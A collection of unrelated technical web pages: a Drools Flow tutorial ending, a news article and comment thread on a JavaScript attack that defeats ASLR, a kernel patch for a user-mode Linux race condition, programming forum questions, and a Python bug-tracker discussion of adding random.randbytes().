    assertEquals(ProcessInstance.STATE_COMPLETED,
        processInstance.getState());
}

Code listing 23: Test for the Approve Event node (DefaultLoanApprovalServiceTest.java file).

Before sending the approved event, we've verified that the process is in the active state and that the Transfer Funds work item hasn't been called yet. After sending the approved event, the test verifies that the Transfer Funds work item was actually executed and that the ruleflow reached its final COMPLETED state.

Banking service

The final step is to implement the approveLoan service that represents the interface to our loan approval process. It ties everything that we've done together. The approveLoan method takes a Loan and the Customer who is requesting the loan.

KnowledgeBase knowledgeBase;
Account loanSourceAccount;

/**
 * Runs the loan approval process for a specified
 * customer's loan.
 */
public void approveLoan(Loan loan, Customer customer) {
    StatefulKnowledgeSession session = knowledgeBase
        .newStatefulKnowledgeSession();
    try {
        // TODO: register work item/human task handlers
        Map<String, Object> parameterMap =
            new HashMap<String, Object>();
        parameterMap.put("loanSourceAccount", loanSourceAccount);
        parameterMap.put("customer", customer);
        parameterMap.put("loan", loan);
        session.insert(loan);
        session.insert(customer);
        ProcessInstance processInstance =
            session.startProcess("loanApproval", parameterMap);
        session.insert(processInstance);
        session.fireAllRules();
    } finally {
        session.dispose();
    }
}

Code listing 24: approveLoan service method of BankingService (DefaultLoanApprovalService.java file).

The service creates a new session.
It should then set up and register all of the work item handlers that we've implemented. This part is left out. Normally, it would involve setting up configuration parameters such as the IP address of an SMTP server for the email work item handler, and so on. Next, the loan and the customer are inserted into the session, the ruleflow is started, and the rules are fired. When the ruleflow completes, the session is disposed. Please be aware that with this solution, the knowledge session is held in memory from the time the ruleflow starts up to the time it finishes.

Disadvantages of a ruleflow

A ruleflow may potentially do more work than it should. This is a direct consequence of how the algorithm behind Drools works. All of the rule constraints are evaluated at fact insertion time. For example, if we have a ruleflow with many nodes and 80% of the time the ruleflow finishes at the second node, most of the computation is wasted. Another disadvantage is that the business logic is now spread across at least two places. The rules are still in the .drl file; however, the ruleflow is in the .rf file. The ruleflow file also contains split node conditions and actions. If somebody wants to get a full understanding of a process, he/she has to look back and forth between these files. This may be fixed in the future by better integration in the Drools Eclipse plugin between the .drl file editor and the .rf file editor (for example, it would be nice to see the rules that belong to a selected ruleflow group).

Summary

We've designed a loan approval service that involves validation of the loan request, customer rating calculation (in the first part), approval events from a supervisor, and finally, a custom domain-specific work item for transferring money between accounts. We've seen Drools Flow's support for human tasks through the WS-HumanTask specification. This allows for greater interoperability between systems from different vendors.
All in all, Drools Flow represents an interesting approach to rules and processes.

If you have read this article, you may be interested to view:

- Drools JBoss Rules 5.0 Flow (Part 1)
- Human-readable Rules with Drools JBoss Rules 5.0 (Part 1)
- Human-readable Rules with Drools JBoss Rules 5.0 (Part 2)

About the Author: Michal Bali

Michal Bali, freelance software developer, has more than 8 years of experience working with Drools and has an extensive knowledge of Java and JEE. He designed and implemented several systems for a major dental insurance company. He is an active member of the Drools community and can be contacted at michalbali@gmail.com.
Researchers have demonstrated an attack that defeats ASLR from JavaScript running in the browser. Address Space Layout Randomization, or ASLR, is an important defense mechanism that can mitigate known and, most importantly, unknown security flaws. ASLR makes it harder for a malicious program to compromise a system by, as the name implies, randomizing the process addresses when the main program is launched. This means an attacker is unlikely to be able to reliably jump to a particular exploited function in memory or to some piece of shellcode planted by an attacker.

Breaking ASLR is a huge step towards simplifying an exploit and making it more reliable. Being able to do it from within JavaScript means that an exploit using this technique can defeat the ASLR protection of a web browser running JavaScript, the most common configuration for Internet users. ASLR has been broken before in some particular scenarios, but this new attack highlights a more profound problem. Since it exploits the way that the memory management unit (MMU) of modern processors uses the cache hierarchy of the processor in order to improve the performance of page table walks, the flaw is in the hardware itself, not the software that is running. There are some steps that software vendors can take to try to mitigate this issue, but a full and proper fix will mean replacing or upgrading the hardware itself.

In their paper, the researchers reached a dramatic conclusion: "… The conclusion is that such caching behavior and strong address space randomization are mutually exclusive. […] a first line of defense against memory error attacks and for future defenses not to rely on it as a pivotal building block." All the details can be consulted in the research team's paper. Meanwhile, they left us some videos of demo attacks on ASLR. The fastest one took only 25 seconds:

45 thoughts on "ASLR^CACHE Attack Defeats Address Space Layout Randomization"

ASLR was only ever a band-aid on top of the wound that is shoddy programming, and all this talk of replacing hardware to fix it is missing the point.
Perhaps now software vendors – especially the browser makers – can be convinced to focus a little more on their software's integrity instead of rushing out the next cool feature-du-jour. I can dream, can't I? Sad to think software security is becoming enough of a concern for everyday users that software vendors will eventually have to start boasting about it as a feature instead of a priority, provided they can actually back up their marketing claims. Hopefully SecOps researchers can continue to help keep these companies honest with their reports.

dream on friend…

I think that in principle what you're talking about makes some sense. But in practice, mistakes happen even in projects that don't include "shoddy programming". For this reason, we need multiple tiers protecting against the most common types of exploits (buffer overflows, for example). This was one of those layers, and this shows a weak spot in that defense.

ASLR is not a protection, it is obfuscation. Security by obscurity NEVER works.

And what is a password? A level of authentication, unrelated to code integrity. No matter how hard you dig into a disassembled binary, you won't magically find the user's password. ASLR is also unrelated to code integrity. How do you suggest code integrity stops someone detecting cache misses?

Anybody with that position has no freaking clue about security. When a security analyst says that security by obscurity should be avoided, they mean that a system _only_ being protected by obscurity should be avoided; best practices for highly secure data/installations etc. include obscurity as a valid protective element. IOW, learn about security instead of spouting out sound bites.

Exactly; ultimately any hidden detail, such as passwords, game plans, or network layout, is security by obscurity. It'd be foolhardy to give any of those away.

Valid is a strong word. Obscurity only prolongs the inevitable. And Peter, passwords are not obscurity, unless some dingus hard-coded one.
They are a form of authentication. How often do you use one-letter passwords? Something that can be reliably brute-forced (not even mentioning actual clever bypasses) is the duct tape of security.

Well, Mozilla is going at it pretty hard with Rust's memory safety.

Ever heard of the Swiss cheese model of security? It's impossible to make an impenetrable barrier; we need things like ASLR, NX, and stack protection not because they are perfect but because nothing will ever be perfect.

Anything that can be defeated so readily is nothing at all.

You clearly have no idea what you're talking about if you are reducing this wonderful attack to "nothing at all".

I don't reduce the attack, I reduce the protection. Something defeated is not a link in a chain of protection, as you seem to imply. It's like saying 'my house has multiple layers of protection because first there is the air you need to pass through to get to the door…'

@Whatnot: No, it is like your house has multiple layers of protection because first you have to enter a locked gate, then enter the maze, and after passing through it, your door. And don't forget to disable the silent alarm..

It's not the first ASLR attack ever; it's the first one(?) demonstrated running reliably inside a JavaScript virtual machine.

Once AES is broken it becomes nothing in terms of encryption, seems simple.

@Whatnot: regarding "broken AES": The question would remain whether it would be broken by 3 months of computation by the combined server power of the NSA, or by a school kid's gaming PC in, e.g., one day. Mostly any lock can be defeated; it is just a question of time.

Is AES likely to be broken? I think mathematically it's unlikely; we can chip away at it, reducing the effective security in bits. But breaking it? Only if we ever work out how to unscramble an egg..
But if there is no such flaw, AES with 256 bits will not be broken. Why? There is a minimum amount of energy necessary to flip a bit. The complete energy the sun can provide until it burns out is not enough to run a simple 256-bit counter through all possible states, and AES is more complicated than a simple counter.

The Swiss cheese model applies to natural, random problems. It fails badly in the face of willful attackers. Software security is made by creating impenetrable barriers. There is no other way, as attacks are too cheap to be deterred by permissive ones.

There is no perfect, flawless code possible. Therefore I see this ASLR more like a helmet. Of course it should not be like with some people who start to wear a helmet for skiing and then go much faster than before, because they feel too safe and over-assured.

Harvard architecture? If data and programs are in separate places, would that help mitigate these things? Program-to-program branches would still be possible, but you can’t use a buffer overflow to inject a program. I don’t know enough about this to know whether this makes sense.

NX does this for modern machines. It marks data as “non-executable”. But, as always, there are ways around it. And modern JavaScript engines use “just in time” compiling, meaning they need to write new program code on the fly. So it generates data and then makes it executable.

@Luke: Short version: you can’t change the code in a Harvard arch, but if you’re able to chain bits of pre-existing code (“gadgets” in the lingo) together into something useful, you can still run your own programs.

If you can defeat it with JavaScript then JavaScript has too many functions and it’s a flaw of JavaScript, I would think. Why does JavaScript have so much capability to defeat all and any protection of anything anyway? Did the freaking NSA sponsor it?

It’s a remarkable attack to achieve in JavaScript,
but really it’s more to do with the excellent JavaScript performance we have these days than a feature. We need something like JavaScript, and we need it to be performant. So what should we do?

Make the functionality reflect where it’s used is what they should do. Same with other web plugins, incidentally, which all have a long history of seemingly adding functions whose primary use is to support hackers, for some reason.

The problem is that the capabilities necessary to do useful things are also the capabilities necessary to produce a hack. Your suggestion is like saying that nobody should have knives in their kitchen because they might be used to hurt people.

JavaScript isn’t an excellent performer; hardware, bandwidth and massive libraries have simply made JavaScript’s lousy performance less of an issue.

It’s honestly really fucking good. Really, REALLY good. Seriously, JavaScript is no longer a joke. I didn’t really believe it, since the last time I actually used it was in the IE6 days when it was still being interpreted; recently I’ve been using it (admittedly more via ClojureScript), but the JIT performance is amazing.

Great, now people can hack you in less than a millisecond. Good for the hackers and spooks and advertisers, since they probably want to hack in bulk, and a million people at a second each is months of waiting.

1) Number-crunching performance tests are no real benchmark for real-world performance, as number crunching is very easy to optimize with a JIT. It’s an area where on some tests JIT languages outperform C code. 2) The NES was emulated already on a 40 MHz 486. So that just shows that JavaScript is up to speed with a 486. 3) Just a variation on 1. But in the end, performance usually does not even matter, as 90% of your execution time is spent in 10% of your code. Making sure your code is maintainable is much more important. And if it is slow, find that 10% and fix that.

I’m just glad that they are fixing the language.
Proper syntax for classes is really welcome, for example. (I write 80% of my code in Python, which isn’t fast. And it’s not important that it isn’t fast.)

@daid303: If you’re not happy with benchmarks, and you’re not happy with real-world performance, and you’re not happy with real-life computationally intensive applications, then what do you base your idea of performance on? JavaScript has its shortcomings in syntax and lack of namespaces, but between Google Closure and the new JIT engines (like V8), the performance is amazing for well-written code (as always, you need good code). It certainly outperforms Python + pygame (I think that’s SDL 1.1, accelerated) when you combine HTML5 and JS in a modern browser.

@daid303: The NES was emulated *badly* on a 40 MHz 486, with massive amounts of accuracy bugs. Cycle-accurate emulation of the NES requires closer to a 1 GHz x86 CPU. But don’t let facts stop you from spreading your ignorant drivel. If you actually looked into modern JS performance you would be impressed.

That’s true for the performance AFTER the initial compilation, but now look at the startup time and the memory footprint of your application, especially if it runs on a small embedded device. Compiled C code still has a long, long life on small embedded devices.

@Whatnot: I’m getting the impression you don’t actually know much about JavaScript or programming.

This is why the industry should have skipped NX and ASLR and cookies and other stuff and gone to sandboxing a long time ago. Sandboxing is far easier to do and all you have to protect are some* APIs.

NX and ASLR are there to protect your sandbox, not to replace it.
https://hackaday.com/2017/02/15/aslrcache-attack-defeats-address-space-layout-randomization/
io_wrapper_open_memory

Name
io_wrapper_open_memory — Open a read-only handle on some memory

Synopsis
#include "io_wrapper.h"

io_object *io_wrapper_open_memory(blob, len, memtype);

Open a read-only handle on some memory.

- blob: start of the memory area
- len: size of the area in bytes
- memtype: type of memory

If memtype is MEMTYPE_DONTCARE, then the memory will NOT be freed when the object is destroyed. If memtype is MEMTYPE_IS_MALLOC_3C, then the memory will be freed using free(3C). If memtype is MEMTYPE_IS_MMAP, then the memory will be released using the munmap() system call; the len parameter must match the length used to mmap() the memory. Otherwise, memtype is one of the MEMTYPE constants defined in memory.h.
https://support.sparkpost.com/momentum/3/3-api/apis-io-wrapper-open-memory
Hello! I am constantly seeing a UBD I/O operation mismatch panic in UML with 2.5 SMP (on an SMP host). Reproducing is simple: just run UML on an SMP host (dual CPU in my case), SMP UML with four CPUs, a single ubd with ext2 on it, and copy 2 kernel sources from one place to another (single fs) (cp -a /tmp/linux* /mnt/ in my case). And it will die with big probability. If it does not, remove the new copies of the kernels, shut down UML, start it again and try once more. There may be a similar problem with the 2.4 UBD kernel, but I have not tried yet.

The race seems to be this way: ubd_handler() at its end calls do_ubd_request() to process the request if there is any on the queue. There is also a do_ubd variable that is used as a lock to protect against each request being processed more than once. But say the queue was empty when we called do_ubd_request() from ubd_handler(); then on the other CPU another thread added a request to the queue at the same time, before do_ubd was set in the first do_ubd_request() invocation (and this first do_ubd_request() had already seen that the list is not empty). So we have two do_ubd_requests working, but by the time the second gets to execute, the head of the queue list has changed and we get the panic.

I fixed that by changing to atomic bit operations to guard against that situation. And this fix seems to work for me. I think this is kind of the right one, too. See the first patch below.

Also, on a sidenote: to build 2.5.44 from bk-current, you need the second patch below (to arch/um/os-Linux/Makefile).
Bye, Oleg

===== arch/um/drivers/ubd_kern.c 1.17 vs edited =====
--- 1.17/arch/um/drivers/ubd_kern.c	Mon Oct 21 11:16:57 2002
+++ edited/arch/um/drivers/ubd_kern.c	Wed Oct 30 18:14:09 2002
@@ -29,6 +29,7 @@
 #include "linux/blkpg.h"
 #include "linux/genhd.h"
 #include "linux/spinlock.h"
+#include "linux/bitops.h"
 #include "asm/segment.h"
 #include "asm/uaccess.h"
 #include "asm/irq.h"
@@ -48,7 +49,10 @@
 static spinlock_t ubd_io_lock = SPIN_LOCK_UNLOCKED;
 static spinlock_t ubd_lock = SPIN_LOCK_UNLOCKED;
-static void (*do_ubd)(void);
+/* We set this when we asked io thread to do some work,
+   by using this flag we can avoid do_ubd_request to schedule
+   io more then once for any given request. (race seen on SMP) */
+static long ubd_servicing;
 static int ubd_open(struct inode * inode, struct file * filp);
 static int ubd_release(struct inode * inode, struct file * file);
@@ -374,7 +378,6 @@
 	struct request *rq = elv_next_request(&ubd_queue);
 	int n;
-	do_ubd = NULL;
 	intr_count++;
 	n = read_ubd_fs(thread_fd, &req, sizeof(req));
 	if(n != sizeof(req)){
@@ -383,6 +386,7 @@
 		spin_lock(&ubd_io_lock);
 		end_request(rq, 0);
 		spin_unlock(&ubd_io_lock);
+		clear_bit(1, &ubd_servicing);
 		return;
 	}
@@ -391,6 +395,7 @@
 		panic("I/O op mismatch");
 	ubd_finish(rq, req.error);
+	clear_bit(1, &ubd_servicing);
 	reactivate_fd(thread_fd, UBD_IRQ);
 	do_ubd_request(&ubd_queue);
 }
@@ -829,16 +834,21 @@
 	}
 	else {
-		if(do_ubd || list_empty(&q->queue_head)) return;
+		/* if there is no requests or if another thread have
+		   already started async io - return */
+		if(list_empty(&q->queue_head) ||
+		   test_and_set_bit(1, &ubd_servicing)) return;
+
 		req = elv_next_request(q);
 		err = prepare_request(req, &io_req);
 		if(!err){
-			do_ubd = ubd_handler;
 			n = write_ubd_fs(thread_fd, (char *) &io_req,
 					 sizeof(io_req));
 			if(n != sizeof(io_req))
 				printk("write to io thread failed, "
 				       "errno = %d\n", -n);
+		} else {
+			clear_bit(1, &ubd_servicing);
 		}
 	}
 }

# This is a BitKeeper generated patch for the following project:
# Project Name: Linux kernel tree
# This patch format is intended for GNU patch command version 2.5 or higher.
# This patch includes the following deltas:
#                ChangeSet    1.808.1.7 -> 1.808.1.8
#    arch/um/os-Linux/Makefile    1.2 -> 1.3
#
# The following is the BitKeeper ChangeSet Log
# --------------------------------------------
# 02/10/29    green@...    1.808.1.8
# Makefile:
#   Prepend filenames with path, as needed by current build scheme.
# --------------------------------------------
#
diff -Nru a/arch/um/os-Linux/Makefile b/arch/um/os-Linux/Makefile
--- a/arch/um/os-Linux/Makefile	Wed Oct 30 18:39:06 2002
+++ b/arch/um/os-Linux/Makefile	Wed Oct 30 18:39:06 2002
@@ -4,10 +4,11 @@
 #
 obj-y = file.o process.o tty.o
+USER_OBJS := $(foreach file,$(obj-y),arch/um/os-Linux/$(file))
 include $(TOPDIR)/Rules.make
-$(obj-y) : %.o: %.c
+$(USER_OBJS) : %.o: %.c
 	$(CC) $(CFLAGS_$@) $(USER_CFLAGS) -c -o $@ $<
 clean :
http://sourceforge.net/p/user-mode-linux/mailman/user-mode-linux-devel/thread/20021030184149.A13381@namesys.com/
I'm trying to make a small program that gives you the average age of your whole family. I'm into arrays in my book, and I'm trying to experiment with stuff. My thoughts behind the program are this....

1. Get total number of family members.
2. Get ages of all the members and insert it into an array.
3. Total up all the ages inside the array and insert that total into a new variable.
4. Send the two variables to a function do the actual averaging and post a witty comment.

Code:
//This is going to be a practice program that averages the age of your family
#include <iostream>
using namespace std;

/* familyfunct is supposed to take the 2 variables from the main function,
   divide them into a third variable average. then run a series of if loops
   dependant on averages number. */
int familyfunct(int combinedages, int famtot, int average){
    cout<<"About to do the math.....\n\n\n";
    average = (combinedages/famtot);
    cout<< average << endl;
    if(average>80){
        cout<<"You're all old!";
    }
    if(average< 20){
        cout<<"You're a young family!";
    }
    if(average< 30){
        cout<<"You're getting older!";
    }
    else{
        cout<<"You're pretty normal";
    }
}

int main(){
    int ages[100]; //this array holds the ages of all family members up to 100 people.
    int FamiTotal, AverAge;
    int i; //for for loop

    cout<< "How many family members do you have?";
    cin>>FamiTotal;
    cout<<"Enter each family members age. Press enter when complete.";
    cin>>ages[]; //this is supposed to insert each family member into the ages[] array

    /* This for loop is supposed to extract the data from the array ages[]
       then add them all up. This is the main problem of the program. */
    for(i=0; i<100; i++){
        AverAge= ages[i]+ ages[i];
    }

    familyfunct(AverAge, FamiTotal); // sends AverAge and FamiTotal
    return 0;
}

Here is what I came up with. I'm new to arrays, and my book doesn't seem to go too much into them right now, so I'm experimenting. The bolded area of my code is the area that I need help on.
How do I extract the list of numbers from my array and then add them up to put that total into a new variable? I figured it'd be some type of for loop, but I don't really know.

Secondly, I'm getting some compiler errors that seem unrelated to the array issue I'm having. Can't quite figure them out, but here they are...

Code:
C:\Users\justin\C++\My Code\arrays1.cpp||In function 'int main()':|
C:\Users\justin\C++\My Code\arrays1.cpp|43|error: expected primary-expression before ']' token|
C:\Users\justin\C++\My Code\arrays1.cpp|10|error: too few arguments to function 'int familyfunct(int, int, int)'|
C:\Users\justin\C++\My Code\arrays1.cpp|50|error: at this point in file|
||=== Build finished: 3 errors, 0 warnings ===|

Well, any help is appreciated! This program is just me experimenting since I'm a self-learner. I don't really have anyone to go to but you guys and my pdf.
https://cboard.cprogramming.com/cplusplus-programming/127718-pulling-data-array.html
Zope GetSlice Bug

Problem: One solution: tested that URL is a string --BillSeitz, 2003/06/25 17:17 GMT
shows:: URL ''

Test case to focus on --BillSeitz, 2003/07/01 18:12 GMT
Most obvious in just trying to list the wiki contents, but since that's horribly long, let's try something simpler. will be the page I try to get to. So I need to figure out how to stop before the 'eval' to look at the values of the params.

trying to debug --BillSeitz, 2003/07/04 13:14 GMT
per < And Debugging.stx> But after doing the import, when I try 'ZPublisher.Zope('/fluxent/webseitz/wiki/manage_propertiesForm')' it spits out a 401 (Unauthorized) response. Nothing in the docs says this will happen. I wonder if you can't use this method on ZMI URLs?

trying zLOG as another approach --BillSeitz, 2003/07/15 17:22 GMT
to dump values like 'action' and 'URL' (note that zLOG dumps the msg to the console, not to a file (for me), which causes problems when there's too much stuff), but I keep getting errors like "global name 'URL' is not defined" - similar problem - pointing to this - which makes it seem like I need to pass an argument somewhere, but I'm not really working at that level, so I don't know what to do, short of messing with code further up the stack (e.g. passing REQUEST into the containing method), which sounds like a bad idea.

back to debug process --BillSeitz, 2003/07/15 23:21 GMT
following the Jul 4 document, but a different process: "Interactive Debugging Triggered From the Web" - insert this into *.py code where you want to set a breakpoint::

import pdb
pdb.set_trace()

then start up Zope normally (but with the -d flag), then request the appropriate URL from the browser - the console will pop you into the debugger at that breakpoint. I hope.

seems to work --BillSeitz, 2003/07/16 02:32 GMT
Gets into pdb.
Here's the pdb docs. Type 'n' to skip ahead from inside of set_trace - end up at 'eval(code,d)'. Type 'p d' to print the value of 'd' and get a pile of HTML which looks like the output of the dtml-request method (Jun 25). Trying 'p code' spits out that you have a 'type code' object - 'p str(code)' doesn't do you any good. Let's move along. Try an 's' to step in. Hmmm, I just continue to get lost. It seems to loop back around to that same 'exec' over and over again - I don't know if I've already triggered the error, or if that happens later on. If I try doing 'c' it repeats something else - I think now it's generating the error traceback page. The browser gets the page eventually. If I request the page again it doesn't seem to go into pdb; I end up with some other traceback involving 'raise bdb.BdbQuit'. Will try some more tomorrow.

code objects --BillSeitz, 2003/07/16 02:37 GMT
Ah, that's a pointer to pseudo-compiled code - see here and find "code objects".

have no clue how to move forward --BillSeitz, 2003/07/16 21:21 GMT
Tried setting the breakpoint at various places, but I honestly have no idea what I'm even looking for. If a 3rd party isn't going to save my bacon, I need to figure out a new approach.

perfect timing! --BillSeitz, 2003/07/16 21:33 GMT
Jamie Heilman pointed out the problem must be from having an object named 'URL' in the folder. That's it! He suggested a code change (in 'manage_tabs.dtml'), but I just settled for removing the object.
http://webseitz.fluxent.com/wiki/ZopeGetSliceBug
JAVA S/W download

Hi, I'm new to Java. I want to download the Java software - where do I need to download it from? Please help me with the link. Thank you.

Hi! You can download Java from
http://roseindia.net/tutorialhelp/comment/26587
Created on 2020-04-14 22:30 by vstinner, last changed 2020-05-05 05:52 by rhettinger. This issue is now closed.

The random module lacks a getrandbytes() method, which leads developers to be creative in how they generate bytes. It's a common user request:

* bpo-13396 in 2011
* bpo-27096 in 2016
* in 2020

Python already has three functions to generate random bytes:

* os.getrandom(): specific to Linux, not portable
* os.urandom()
* secrets.token_bytes()

These 3 functions are based on system entropy, and they block on Linux until the kernel has collected enough entropy: PEP 524. While many users are fine with these functions, there are also use cases for simulation where security doesn't matter, and it's more about being able to get a reproducible experience from a seed. That's what random.Random is about. The numpy module provides a numpy.random.bytes(length) function for such use cases. One example can be to generate a UUID4 with the ability to reproduce the random UUID from a seed for testing purposes, or to get reproducible behavior. Attached PR implements the getrandbytes() method.

If we have to have this, the method name should be differentiated from getrandbits() because the latter returns an integer. I suggest just random.bytes(n), the same as numpy.

> Python already has three functions to generate random bytes:

Now, there will be four ;-)

> I suggest just random.bytes(n), the same as numpy.

The problem with this is that people who `from random import *` (some schools insist on this, probably because most functions they need already start with `rand`) will shadow the builtin `bytes`. Not that those schools do anything with `bytes`, but still, it might be inconvenient. (The meta-problem is of course that some functions already do the "poor man's namespacing" C-style by starting with `rand`, and some don't. I'm always for user control of namespacing, but I'm just saying that it doesn't correspond to how many beginners use the `random` module.)
Do you have another name suggestion that doesn't have a parallelism problem with the existing name? The names getrandbytes() and getrandbits() suggest a parallelism that is incorrect.

I think that the "module owner" ;-P must decide whether the `random` module should follow the C namespacing or not. Of course, I'm in the "not" camp, so I believe those two "rand..." functions (randrange is completely redundant with random.choice(range)) should be supplemented with random.int and random.float. And then random.bytes will be completely natural. And people might be gently nudged in the right direction when using Python module namespaces.

I concur that bytes() isn't a good name, but am still concerned that the proposed name is a bad API decision. Maybe randbytes()?

I like the "from random import randbytes" name. I concur that "from random import bytes" overrides the bytes() builtin type and so can likely cause trouble.

I updated my PR to rename the method to randbytes(). The performance of the new method is not my first motivation. My first motivation is to avoid consumers of the random module writing a wrong implementation which would be biased. It's too easy to write biased functions without noticing. Moreover, it seems like we can do something to get reproducible behavior on different architectures (different endianness), which would also be a nice feature. For example, in bpo-13396, Amaury found these two functions in the wild:

* struct.pack("Q", random.getrandbits(64))
* sha1(str(random.getrandbits(8*20))).digest()

As I wrote, users are creative at working around missing features :-) I don't think that these two implementations give the same result on big and little endian.

All Random methods give the same result independently of the endianness and bitness of the platform.

> I don't think that these two implementations give the same result on big and little endian.

The second one does.
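The seeded-reproducibility use case from the issue description, and the relation between randbytes() and getrandbits() that the later consistency change (GH-19574) pinned down, can be checked directly. Requires Python ≥ 3.9; the byte-for-byte equality with getrandbits(n * 8).to_bytes(n, 'little') is CPython behavior, not a documented guarantee:

```python
import random
import uuid

# Reproducibility: the same seed yields the same byte string.
a = random.Random(850779834)
b = random.Random(850779834)
assert a.randbytes(16) == b.randbytes(16)

# Relation to getrandbits(): in CPython, randbytes(n) produces the same
# bytes as getrandbits(n * 8) serialized little-endian.
for n in (1, 4, 16, 1024):
    g1 = random.Random(42)
    g2 = random.Random(42)
    assert g1.randbytes(n) == g2.getrandbits(n * 8).to_bytes(n, "little")

# The UUID4 example from the issue: a reproducible UUID from a seed.
gen = random.Random(1234)
u = uuid.UUID(bytes=gen.randbytes(16), version=4)
print(u.version)  # → 4
```

This is exactly the simulation/testing niche the issue describes: unlike os.urandom() or secrets.token_bytes(), the output is fully determined by the seed.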
I wrote a quick benchmark:
---
import pyperf
import random

gen = random.Random()
# gen = random.SystemRandom()
gen.seed(850779834)

if 1: #hasattr(gen, 'randbytes'):
    func = type(gen).randbytes
elif 0:
    def py_randbytes(gen, n):
        data = bytearray(n)
        i = 0
        while i < n:
            chunk = 4
            word = gen.getrandbits(32)
            word = word.to_bytes(4, 'big')
            chunk = min(n, 4)
            data[i:i+chunk] = word[:chunk]
            i += chunk
        return bytes(data)
    func = py_randbytes
else:
    def getrandbits_to_bytes(gen, n):
        return gen.getrandbits(n * 8).to_bytes(n, 'little')
    func = getrandbits_to_bytes

runner = pyperf.Runner()
for nbytes in (1, 4, 16, 1024, 1024 * 1024):
    runner.bench_func(f'randbytes({nbytes})', func, gen, nbytes)
---

Results on Linux using gcc -O3 (without LTO or PGO), using the C randbytes() implementation as the reference:

+--------------------+-------------+----------------------------------+-------------------------------+
| Benchmark          | c_randbytes | py_randbytes                     | getrandbits_to_bytes          |
+====================+=============+==================================+===============================+
| randbytes(1)       | 71.4 ns     | 1.04 us: 14.51x slower (+1351%)  | 244 ns: 3.42x slower (+242%)  |
+--------------------+-------------+----------------------------------+-------------------------------+
| randbytes(4)       | 71.4 ns     | 1.03 us: 14.48x slower (+1348%)  | 261 ns: 3.66x slower (+266%)  |
+--------------------+-------------+----------------------------------+-------------------------------+
| randbytes(16)      | 81.9 ns     | 3.07 us: 37.51x slower (+3651%)  | 321 ns: 3.92x slower (+292%)  |
+--------------------+-------------+----------------------------------+-------------------------------+
| randbytes(1024)    | 1.05 us     | 173 us: 165.41x slower (+16441%) | 3.66 us: 3.49x slower (+249%) |
+--------------------+-------------+----------------------------------+-------------------------------+
| randbytes(1048576) | 955 us      | 187 ms: 196.30x slower (+19530%) | 4.37 ms: 4.58x slower (+358%) |
+--------------------+-------------+----------------------------------+-------------------------------+

* c_randbytes: PR 19527, randbytes() methods implemented in C
* py_randbytes: bytearray, getrandbits(), .to_bytes()
* getrandbits_to_bytes: Serhiy's implementation: gen.getrandbits(n * 8).to_bytes(n, 'little')

So well, the C randbytes() implementation is always the fastest.

random.SystemRandom().randbytes() (os.urandom(n)) performance, using random.Random().randbytes() (Mersenne Twister) as a reference:

+--------------------+-------------+---------------------------------+
| Benchmark          | c_randbytes | systemrandom                    |
+====================+=============+=================================+
| randbytes(1)       | 71.4 ns     | 994 ns: 13.93x slower (+1293%)  |
+--------------------+-------------+---------------------------------+
| randbytes(4)       | 71.4 ns     | 1.04 us: 14.60x slower (+1360%) |
+--------------------+-------------+---------------------------------+
| randbytes(16)      | 81.9 ns     | 1.02 us: 12.49x slower (+1149%) |
+--------------------+-------------+---------------------------------+
| randbytes(1024)    | 1.05 us     | 6.22 us: 5.93x slower (+493%)   |
+--------------------+-------------+---------------------------------+
| randbytes(1048576) | 955 us      | 5.64 ms: 5.91x slower (+491%)   |
+--------------------+-------------+---------------------------------+

os.urandom() is way slower than Mersenne Twister. Well, that's not surprising: os.urandom() requires at least one syscall (the getrandom() syscall on my Linux machine).
New changeset 9f5fe7910f4a1bf5a425837d4915e332b945eb7b by Victor Stinner in branch 'master':
bpo-40286: Add randbytes() method to random.Random (GH-19527)

New changeset 223221b290db00ca1042c77103efcbc072f29c90 by Serhiy Storchaka in branch 'master':
bpo-40286: Makes simpler the relation between randbytes() and getrandbits() (GH-19574)

New changeset 87502ddd710eb1f030b8ff5a60b05becea3f474f by Victor Stinner in branch 'master':
bpo-40286: Use random.randbytes() in tests (GH-19575)

The randbytes() method needs to depend on genrandbits(). It is documented that custom generators can supply their own random() and genrandbits() methods and expect that the other downstream generators all follow. See the attached example, which demonstrates that randbytes() bypasses this framework pattern.

Also, please don't change the name of the genrand_int32() function. It was a goal to change as little as possible from the official, standard version of the C code at . For the most part, we just want to wrap that code for Python bindings, but not modify it. Direct link to MT code that I would like to leave mostly unmodified:

When a new method gets added to a module, it should happen in a way that is in harmony with the module's design. I created bpo-40346: "Redesign random.Random class inheritance".

$ ./python -m timeit -s 'import random' 'random.randbytes(10**6)'
200 loops, best of 5: 1.36 msec per loop
$ ./python -m timeit -s 'import random' 'random.getrandbits(10**6*8).to_bytes(10**6, "little")'
50 loops, best of 5: 6.31 msec per loop

The Python implementation is only 5 times slower than the C implementation. I am fine with implementing randbytes() in Python. This would automatically make it depend on the getrandbits() implementation.

Raymond: >.

I don't see how 30 lines makes Python so much harder to maintain. These lines make the function 4x to 5x faster. We are not talking about 5% or 10% faster. I think that such an optimization is worth it.
When did we decide to stop optimizing Python?

Raymond: > The randbytes() method needs to depend on genrandbits().

I created bpo-40346: "Redesign random.Random class inheritance" for a more generic fix, not just randbytes().

Raymond: > Also, please don't change the name of the genrand_int32() function. It was a goal to change as little as possible from the official, standard version of the C code at .

This code was already modified to replace "unsigned long" with "uint32_t", for example. I don't think that renaming genrand_int32() to genrand_uint32() makes the code impossible to maintain. Moreover, it seems like it was not updated for 13 years.

Raymond: > The randbytes() method needs to depend on genrandbits().

I created PR 19700, which allows keeping the optimization (the C implementation in _randommodule.c) while Random subclasses implement randbytes() with getrandbits().
https://bugs.python.org/issue40286
Project setup

How does the app start?

For each platform in Xamarin.Forms, you call the LoadApplication method, which creates a new application and starts your app.

LoadApplication(new App());

In Flutter, the default main entry point is main, where you load your Flutter app.

void main() {
  runApp(new MyApp());
}

In Xamarin.Forms, you assign a Page to the Application class.

public class App : Application
{
    public App()
    {
        MainPage = new ContentPage
        {
            Content = new Label
            {
                Text = "Hello World",
                HorizontalOptions = LayoutOptions.Center,
                VerticalOptions = LayoutOptions.Center
            }
        };
    }
}

In Flutter, "everything is a widget", even the application itself. The following example shows MyApp, a simple application widget.

class MyApp extends StatelessWidget {
  // This widget is the root of your application.
  @override
  Widget build(BuildContext context) {
    return new Center(
        child: Text("Hello World!", textDirection: TextDirection.ltr));
  }
}

How do you create a page?

Xamarin.Forms has many different types of pages; ContentPage is the most common. In Flutter, you specify an application widget that holds your root page. You can use a MaterialApp widget, which supports Material Design; a CupertinoApp widget, which supports an iOS-style app; or the lower-level WidgetsApp, which you can customize in any way you want.

